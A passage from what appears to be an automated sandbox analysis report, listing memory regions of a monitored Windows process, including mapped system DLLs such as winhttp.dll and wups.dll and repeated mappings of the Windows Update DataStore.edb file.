start_va = 0x7fefa6a0000
end_va = 0x7fefa710fff
monitored = 0
entry_point = 0x7fefa6a1010
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 5856
start_va = 0x7fefa630000
end_va = 0x7fefa693fff
monitored = 0
entry_point = 0x7fefa631254
region_type = mapped_file
name = "webio.dll"
filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll")
Region:
id = 5857
start_va = 0x7fef57c0000
end_va = 0x7fef57dafff
monitored = 0
entry_point = 0x7fef57c1198
region_type = mapped_file
name = "cabinet.dll"
filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll")
Region:
id = 5858
start_va = 0x7fef72e0000
end_va = 0x7fef72eefff
monitored = 0
entry_point = 0x7fef72e9a48
region_type = mapped_file
name = "mspatcha.dll"
filename = "\\Windows\\System32\\mspatcha.dll" (normalized: "c:\\windows\\system32\\mspatcha.dll")
Region:
id = 5859
start_va = 0x34f0000
end_va = 0x35effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000034f0000"
filename = ""
Region:
id = 5860
start_va = 0x77e00000
end_va = 0x77e06fff
monitored = 0
entry_point = 0x77e0106c
region_type = mapped_file
name = "psapi.dll"
filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll")
Region:
id = 5861
start_va = 0x9e0000
end_va = 0x9effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009e0000"
filename = ""
Region:
id = 5862
start_va = 0x9f0000
end_va = 0x9f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5863
start_va = 0xa00000
end_va = 0xa06fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5864
start_va = 0x9f0000
end_va = 0x9f0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll")
Region:
id = 5865
start_va = 0xa00000
end_va = 0xa06fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui")
Region:
id = 5866
start_va = 0x7fefd040000
end_va = 0x7fefd047fff
monitored = 0
entry_point = 0x7fefd042a6c
region_type = mapped_file
name = "wmsgapi.dll"
filename = "\\Windows\\System32\\wmsgapi.dll" (normalized: "c:\\windows\\system32\\wmsgapi.dll")
Region:
id = 5867
start_va = 0x7fef7280000
end_va = 0x7fef728cfff
monitored = 0
entry_point = 0x7fef7281104
region_type = mapped_file
name = "wups.dll"
filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll")
Region:
id = 5868
start_va = 0x7fef7280000
end_va = 0x7fef728efff
monitored = 0
entry_point = 0x7fef7286fb0
region_type = mapped_file
name = "wups2.dll"
filename = "\\Windows\\System32\\wups2.dll" (normalized: "c:\\windows\\system32\\wups2.dll")
Region:
id = 5869
start_va = 0x38b0000
end_va = 0x396ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 5870
start_va = 0x9f0000
end_va = 0xa09fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000009f0000"
filename = ""
Region:
id = 5871
start_va = 0x3970000
end_va = 0x3a6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003970000"
filename = ""
Region:
id = 5872
start_va = 0x5460000
end_va = 0x555ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005460000"
filename = ""
Region:
id = 5873
start_va = 0x5560000
end_va = 0x565ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005560000"
filename = ""
Region:
id = 5874
start_va = 0x5660000
end_va = 0x575ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005660000"
filename = ""
Region:
id = 5875
start_va = 0xa10000
end_va = 0xa10fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a10000"
filename = ""
Region:
id = 5876
start_va = 0xa90000
end_va = 0xaeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a90000"
filename = ""
Region:
id = 5877
start_va = 0xa90000
end_va = 0xa9ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a90000"
filename = ""
Region:
id = 5878
start_va = 0xaa0000
end_va = 0xaaffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000aa0000"
filename = ""
Region:
id = 5879
start_va = 0xab0000
end_va = 0xabffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ab0000"
filename = ""
Region:
id = 5880
start_va = 0xac0000
end_va = 0xacffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ac0000"
filename = ""
Region:
id = 5881
start_va = 0xad0000
end_va = 0xadffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ad0000"
filename = ""
Region:
id = 5882
start_va = 0xae0000
end_va = 0xaeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ae0000"
filename = ""
Region:
id = 5883
start_va = 0xa20000
end_va = 0xa20fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a20000"
filename = ""
Region:
id = 5884
start_va = 0x5860000
end_va = 0x58dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005860000"
filename = ""
Region:
id = 5885
start_va = 0x7fffff82000
end_va = 0x7fffff83fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff82000"
filename = ""
Region:
id = 5886
start_va = 0x5760000
end_va = 0x585ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005760000"
filename = ""
Region:
id = 5887
start_va = 0x5bf0000
end_va = 0x5ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005bf0000"
filename = ""
Region:
id = 5888
start_va = 0xfb0000
end_va = 0x100ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000fb0000"
filename = ""
Region:
id = 5889
start_va = 0xfb0000
end_va = 0xfbffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000fb0000"
filename = ""
Region:
id = 5890
start_va = 0xfc0000
end_va = 0xfcffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000fc0000"
filename = ""
Region:
id = 5891
start_va = 0xfd0000
end_va = 0xfdffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000fd0000"
filename = ""
Region:
id = 5892
start_va = 0xfe0000
end_va = 0xfeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000fe0000"
filename = ""
Region:
id = 5893
start_va = 0xff0000
end_va = 0xffffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000ff0000"
filename = ""
Region:
id = 5894
start_va = 0x1000000
end_va = 0x100ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001000000"
filename = ""
Region:
id = 5895
start_va = 0xa30000
end_va = 0xa37fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a30000"
filename = ""
Region:
id = 5896
start_va = 0x5cf0000
end_va = 0x6ceffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cf0000"
filename = ""
Region:
id = 5897
start_va = 0xa40000
end_va = 0xa4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a40000"
filename = ""
Region:
id = 5898
start_va = 0xa50000
end_va = 0xa5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a50000"
filename = ""
Region:
id = 5899
start_va = 0xaf0000
end_va = 0xafffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000af0000"
filename = ""
Region:
id = 5900
start_va = 0xb00000
end_va = 0xb00fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000b00000"
filename = ""
Region:
id = 5901
start_va = 0xe00000
end_va = 0xe01fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e00000"
filename = ""
Region:
id = 5902
start_va = 0x1260000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001260000"
filename = ""
Region:
id = 5903
start_va = 0x1260000
end_va = 0x129ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001260000"
filename = ""
Region:
id = 5904
start_va = 0x12a0000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000012a0000"
filename = ""
Region:
id = 5905
start_va = 0xe10000
end_va = 0xe10fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e10000"
filename = ""
Region:
id = 5906
start_va = 0x1260000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001260000"
filename = ""
Region:
id = 5907
start_va = 0x1260000
end_va = 0x129ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001260000"
filename = ""
Region:
id = 5908
start_va = 0x12a0000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000012a0000"
filename = ""
Region:
id = 5909
start_va = 0x6cf0000
end_va = 0x6e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006cf0000"
filename = ""
Region:
id = 5910
start_va = 0x6cf0000
end_va = 0x6e2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006cf0000"
filename = ""
Region:
id = 5911
start_va = 0xe20000
end_va = 0xe20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e20000"
filename = ""
Region:
id = 5912
start_va = 0x1260000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001260000"
filename = ""
Region:
id = 5913
start_va = 0x1260000
end_va = 0x129ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001260000"
filename = ""
Region:
id = 5914
start_va = 0x12a0000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000012a0000"
filename = ""
Region:
id = 5915
start_va = 0xe20000
end_va = 0xe20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e20000"
filename = ""
Region:
id = 5916
start_va = 0xe30000
end_va = 0xe31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 5917
start_va = 0x1260000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001260000"
filename = ""
Region:
id = 5918
start_va = 0x1260000
end_va = 0x129ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001260000"
filename = ""
Region:
id = 5919
start_va = 0x12a0000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000012a0000"
filename = ""
Region:
id = 5920
start_va = 0x6cf0000
end_va = 0x6e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000006cf0000"
filename = ""
Region:
id = 5921
start_va = 0x6cf0000
end_va = 0x6e2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000006cf0000"
filename = ""
Region:
id = 5922
start_va = 0xe30000
end_va = 0xe30fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 5923
start_va = 0x1260000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001260000"
filename = ""
Region:
id = 5924
start_va = 0x1260000
end_va = 0x129ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001260000"
filename = ""
Region:
id = 5925
start_va = 0x12a0000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000012a0000"
filename = ""
Region:
id = 5926
start_va = 0xe20000
end_va = 0xe2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e20000"
filename = ""
Region:
id = 5927
start_va = 0xe30000
end_va = 0xe37fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e30000"
filename = ""
Region:
id = 5928
start_va = 0x1010000
end_va = 0x101ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001010000"
filename = ""
Region:
id = 5929
start_va = 0x1120000
end_va = 0x112ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001120000"
filename = ""
Region:
id = 5930
start_va = 0x11b0000
end_va = 0x11b7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011b0000"
filename = ""
Region:
id = 5931
start_va = 0x11c0000
end_va = 0x11c7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011c0000"
filename = ""
Region:
id = 5932
start_va = 0x11d0000
end_va = 0x11d7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011d0000"
filename = ""
Region:
id = 5933
start_va = 0x12e0000
end_va = 0x12e1fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012e0000"
filename = ""
Region:
id = 5934
start_va = 0x11b0000
end_va = 0x11b7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000011b0000"
filename = ""
Region:
id = 5935
start_va = 0x12e0000
end_va = 0x12effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012e0000"
filename = ""
Region:
id = 5936
start_va = 0x12e0000
end_va = 0x12e7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012e0000"
filename = ""
Region:
id = 5937
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5938
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5939
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5940
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5941
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5942
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5943
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5944
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5945
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5946
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5947
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5948
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5949
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5950
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5951
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5952
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5953
start_va = 0x1fc0000
end_va = 0x203ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fc0000"
filename = ""
Region:
id = 5954
start_va = 0x7fffff7e000
end_va = 0x7fffff7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7e000"
filename = ""
Region:
id = 5955
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5956
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5957
start_va = 0x12e0000
end_va = 0x12effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000012e0000"
filename = ""
Region:
id = 5958
start_va = 0x1370000
end_va = 0x137ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001370000"
filename = ""
Region:
id = 5959
start_va = 0x1380000
end_va = 0x138ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001380000"
filename = ""
Region:
id = 5960
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5961
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5962
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5963
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5964
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5965
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5966
start_va = 0x1390000
end_va = 0x1397fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001390000"
filename = ""
Region:
id = 5967
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5968
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5969
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5970
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5971
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5972
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5973
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5974
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5975
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5976
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5977
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5978
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5979
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5980
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5981
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5982
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5983
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5984
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5985
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5986
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5987
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5988
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5989
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5990
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5991
start_va = 0x11c0000
end_va = 0x11cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
filename = "\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb" (normalized: "c:\\windows\\softwaredistribution\\datastore\\datastore.edb")
Region:
id = 5992
start_va = 0x11d0000
end_va = 0x11dffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "datastore.edb"
